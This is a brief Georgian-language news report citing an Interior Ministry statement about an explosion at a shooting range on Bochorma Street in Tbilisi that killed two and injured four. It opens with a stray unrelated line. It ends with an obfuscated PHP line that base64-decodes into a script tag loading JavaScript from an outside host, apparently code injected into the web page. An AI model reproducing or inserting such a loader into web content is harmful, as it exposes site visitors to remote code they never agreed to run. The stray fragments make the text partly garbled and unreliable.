celsiusi
ავერსი შნაიდერი

თბილისში, ბოჭორმის ქუჩაზე, სასროლეთში აფეთქების შედეგად დაიღუპა ორი და დაშავდა ოთხი ადამიანი, – ამის შესახებ განცხადებას შსს-ს ავრცელებს.

„თბილისში, ბოჭორმის ქუჩა N12-ში, მაღაზია „ბეთლგრაუნდის“ სასროლეთში მომხდარი აფეთქების შედეგად, ამ ეტაპზე არსებული ინფორმაციით, გარდაცვლილია ორი და დაშავებულია ოთხი მოქალაქე, რომლებიც სასწრაფო-სამედიცინო დახმარების ჯგუფების მიერ სხვადასხვა საავადმყოფოში არიან გადაყვანილი.

შეტყობინების მიღებისთანავე ადგილზე გამოცხადდნენ შინაგან საქმეთა სამინისტროს შესაბამისი დანაყოფების თანამშრომლები, მათ შორის მეხანძრე-მაშველები, საპატრულო პოლიციისა და კრიმინალური პოლიციის წარმომადგენლები.

ამ დროისთვის ტარდება ყველა საჭირო ღონისძიება“, – აღნიშნულია შსს-ს განცხადებაში.

167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");